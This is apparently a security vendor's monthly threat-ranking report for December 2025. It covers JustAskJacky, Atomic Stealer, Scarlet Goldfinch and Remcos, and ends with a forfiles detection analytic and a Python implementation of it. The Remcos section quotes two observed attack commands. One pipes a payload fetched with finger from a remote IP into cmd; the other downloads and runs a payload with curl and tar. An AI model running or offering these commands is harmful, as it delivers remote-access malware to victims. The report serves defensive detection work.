Highlights from December
JustAskJacky, a family of malicious NodeJS applications that masquerade as a helpful AI or utility tool while conducting reconnaissance and executing arbitrary commands in memory in the background, remained in first place on our top 10 most prevalent threats list for the third month running. That said, the overall volume of JustAskJacky that we’ve seen has dropped considerably in those months; December activity was one fifth the volume we observed in October 2025. At Red Canary we track the whole family of tools under the name JustAskJacky, but we’ve seen more than a dozen different lure names, including AllManualsReader, AskBettyHow, ManualReaderPro, OpenMyManual, and others.
In a tie for third this month is Atomic Stealer, an information stealer designed to target data within web browsers and locally stored files on macOS systems, with the goal of accessing sensitive information including credentials, payment card data, keychain details, and cryptocurrency wallets. Atomic Stealer has been in the top 10 list for the last five months, and jumped into third after tying for seventh in December 2025.
Scarlet Goldfinch shared the tie for third, which is the highest Scarlet Goldfinch has ranked on our list since June 2025. Also known as FakeSG, Scarlet Goldfinch is Red Canary’s name for an activity cluster that uses compromised web sites to trick users into executing malicious code. In December, as in most of 2025, we saw Scarlet Goldfinch leverage paste-and-run as an initial execution technique to deliver its payloads.
Both of Scarlet Goldfinch’s December 2025 payloads made the top 10 list this month, tied for eighth:
- NetSupport Manager, a legitimate remote access tool (RAT) that can be used as a trojan by adversaries to remotely control victim endpoints for unauthorized access. NetSupport Manager dropped from fourth place last month, in part due to Scarlet Goldfinch also delivering Remcos (see below) in some instances.
- Remcos, a legitimate closed-source tool marketed as remote control and surveillance software, often used to gain persistent remote access to systems, made its debut on the top 10 list. You can learn more about Remcos below.
This month’s top 10 threats
To track pervasiveness over time, we identify the number of unique customer environments in which we observed a given threat and compare it to what we’ve seen in previous months.
Here’s how the numbers shook out for December 2025:
| Month's rank | Threat name | Threat description |
|---|---|---|
| ➡ 1 | JustAskJacky | Family of malicious NodeJS applications that masquerade as a helpful AI or utility tool while conducting reconnaissance and executing arbitrary commands in memory in the background |
| ⬆ 2 |  | Red Canary's name for a cluster of activity, delivered via installers masquerading as legitimate free software, that progresses through several stages to a PyInstaller EXE with stealer capabilities |
| ⬆ 3* | Atomic Stealer | Information stealer designed to target data within web browsers and locally stored files on macOS systems, with the goal of accessing sensitive information including credentials, payment card data, keychain details, and cryptocurrency wallets |
| ⬆ 3* | Scarlet Goldfinch | Red Canary's name for an activity cluster that uses compromised web sites to trick users into executing malicious code |
| ⬇ 5 |  | ConnectWise product that administrators and adversaries alike use to remotely access and manage devices |
| ⬆ 6* |  | Collection of Python classes to construct/manipulate network protocols |
| ⬆ 6* |  | Traffic distribution system, first observed in 2024, that uses compromised WordPress sites to deploy malicious code that may lead to malware families such as Rhysida and Interlock ransomware, D3F@ck Loader, Mocha Manakin, Mintsloader, and WARMCOOKIE |
| ⬆ 8* |  | Malware family used as part of a botnet. Some variants are worms and frequently spread via infected USB drives |
| ⬇ 8* | NetSupport Manager | Legitimate remote access tool (RAT) that can be used as a trojan by adversaries to remotely control victim endpoints for unauthorized access |
| ⬆ 8* | Remcos | Legitimate closed-source tool marketed as remote control and surveillance software, often used to gain persistent remote access to systems |

⬆ = trending up from previous month
⬇ = trending down from previous month
➡ = no change in rank from previous month
*Denotes a tie
Rogue RMM: Remcos’s rise
Remcos may be new to the top 10, but it is not new to Red Canary or to defenders. While it’s ostensibly a legitimate RMM tool developed by the company Breaking Security, multiple adversaries have used Remcos since its inception to gain persistent remote access to systems. Remcos first emerged in 2016 as a purchasable service on hacking forums. A free version is available that includes basic remote administration capabilities; additional features like keylogging, camera and microphone access, and additional stealth options are available for purchase.
Remcos made its way into the December top 10 by becoming a Scarlet Goldfinch payload. In some cases we saw NetSupport delivered alongside Remcos, and in others Remcos was the only payload we observed. It may be that the activity cluster is testing new tools to supplement or possibly replace its longstanding use of NetSupport Manager for remote access. The activity we observed in December began with successful paste-and-run lure execution, a technique that Scarlet Goldfinch has been using since April 2025. One interesting change in December was the use of finger in commands, as in this example we observed:
```
"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" Start-Process cmd -ArgumentList '/c finger Galo@91.193.19[.]108 | cmd' -WindowStyle Hidden; ' Verify you are human--press ENTER '
```
This command leverages the TCP/IP Finger command to execute a remotely hosted payload at 91.193.19[.]108; in this example the payload was NetSupport Manager. Successful execution of the command led to curl downloading an archive file with a misleading PDF extension. The contents of the file were extracted using tar -xf, which placed a malicious Remcos DLL and a legitimate EXE vulnerable to DLL sideloading onto the endpoint. Here’s an example of a command we saw in late December 2025:
```
powershell.exe -NoProfile -Command "$rand = 458721; $data = \"C:\Users\username\AppData\Local\"; $ZXJQLMPTVRAYWGUK = Join-Path $data $rand; curl -s -L -o \"$ZXJQLMPTVRAYWGUK.pdf\" 79.141.172[.]212/tcp; mkdir \"$ZXJQLMPTVRAYWGUK\"; tar -xf \"$ZXJQLMPTVRAYWGUK.pdf\" -C \"$ZXJQLMPTVRAYWGUK\"; $exePath = \"$ZXJQLMPTVRAYWGUK\intelbq.exe\"; Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = \"`\"$exePath`\"\"}; "
```
Adversaries often attempt to obfuscate Remcos’s code and/or inject it into other processes to try to evade endpoint security solutions, since most products have become proficient at detecting its execution and it doesn’t have the same kind of widespread accepted use as NetSupport Manager. In one example we saw, the sideloading host was nearby_share.exe, a legitimate Quick Share binary, with Remcos subsequently running via DLL sideload.
If allowed to continue, follow-on activity can include downloading additional payloads and system and domain reconnaissance.
At the time of publication, third-party researchers reported concurrent campaigns delivering Remcos, indicating that its popularity as a payload may be trending upward. Historically, Remcos is also a popular payload for tax-themed phishing campaigns at the beginning of the year. Fortunately for defenders, Remcos requires an initial access and delivery vehicle of some kind. In December 2025, we observed adversaries leveraging the forfiles LOLBAS to execute commands and reach out to remote resources early in the execution chain. That gives us a detection opportunity.
Detection opportunity: The Windows utility forfiles using command-line options consistent with indirect execution, including /p path, /m searchmask, /c and a command to execute
The following pseudo detection analytic identifies forfiles using command-line options consistent with indirect execution, including /p path, /m searchmask, /c and a command to execute. This combination of switches does not normally occur, and it can be used to execute malicious commands or proxy execution to a different binary, as we observed with Remcos delivery in December 2025. We recommend you exclude command-line patterns found in legitimate administrative use in your environment to reduce noise.
```
process == forfiles
&&
command_includes (/c, -c)
&&
command_includes (/p, -p)
&&
command_includes (/m, -m)
&&
command_does_not_include (*)
```
Note: * is a placeholder for legitimate forfiles command line strings in your environment
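Here is how that pseudo analytic could be expressed in code so it can be tested against sample telemetry. This is an added example, not Red Canary's detection logic; the event shape, the single exclusion pattern and the sample command lines are all constructed for illustration.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List

# Minimal normalized process-creation record (a constructed shape, not real EDR telemetry).
@dataclass
class ProcessEvent:
    image: str         # full path of the launched executable
    command_line: str  # raw command line as logged

# forfiles accepts its switches with either a '/' or '-' prefix, in any case.
# The switch must start a whitespace-delimited token so "/c" inside a path is not counted.
SWITCH_RE = re.compile(r"(?<!\S)[/-]([cpm])(?=\s|$)", re.IGNORECASE)
REQUIRED = {"c", "p", "m"}

def is_forfiles(image: str) -> bool:
    """True when the image file name is forfiles.exe, regardless of directory or case."""
    name = image.replace("/", "\\").rsplit("\\", 1)[-1]
    return name.lower() == "forfiles.exe"

def present_switches(command_line: str) -> set:
    """Return which of the /c, /p, /m switches appear (lower-cased, prefix-agnostic)."""
    return {m.group(1).lower() for m in SWITCH_RE.finditer(command_line)}

def matches_analytic(event: ProcessEvent, exclusions: Iterable[re.Pattern]) -> bool:
    """process == forfiles && /c && /p && /m && no tuned exclusion matches."""
    if not is_forfiles(event.image):
        return False
    if not REQUIRED <= present_switches(event.command_line):
        return False
    return not any(rx.search(event.command_line) for rx in exclusions)

def run_analytic(events: Iterable[ProcessEvent], exclusions: Iterable[re.Pattern]) -> List[str]:
    """Return the command lines that fire, so exclusions can be tuned against real hits."""
    exclusions = list(exclusions)
    return [e.command_line for e in events if matches_analytic(e, exclusions)]

# Constructed exclusion standing in for the '*' placeholder: a hypothetical log-rotation job.
EXCLUSIONS = [re.compile(r'/p\s+C:\\Logs\\?\s+/m\s+\*\.log\s+/d\s+-\d+\s+/c\s+"cmd /c del @path"', re.I)]

# Constructed sample events covering cases the analytic should and should not fire on.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\forfiles.exe", r'forfiles /p C:\Users\Public /m *.txt /c "cmd /c calc.exe"'),     # fires
    ProcessEvent(r"C:\Windows\System32\forfiles.exe", r'forfiles.exe /p C:\Logs /m *.log /d -30 /c "cmd /c del @path"'), # excluded
    ProcessEvent(r"C:\Windows\System32\forfiles.exe", r'forfiles /p C:\Temp /c "cmd /c echo @file"'),                   # no /m
    ProcessEvent(r"C:\Windows\System32\cmd.exe", r'cmd.exe /c forfiles /p C:\ /m *.dll /c "cmd /c calc.exe"'),          # wrong process
    ProcessEvent(r"C:\Windows\SysWOW64\FORFILES.EXE", r'FORFILES -P C:\ -M *.dll -C "cmd /c calc.exe"'),                # dash/case variant
]

if __name__ == "__main__":
    for hit in run_analytic(SAMPLE_EVENTS, EXCLUSIONS):
        print("ALERT:", hit)
```

Only the first and last sample events fire; the second is suppressed by the exclusion, the third lacks /m, and the fourth is cmd.exe rather than forfiles, which is the case the process clause exists to separate.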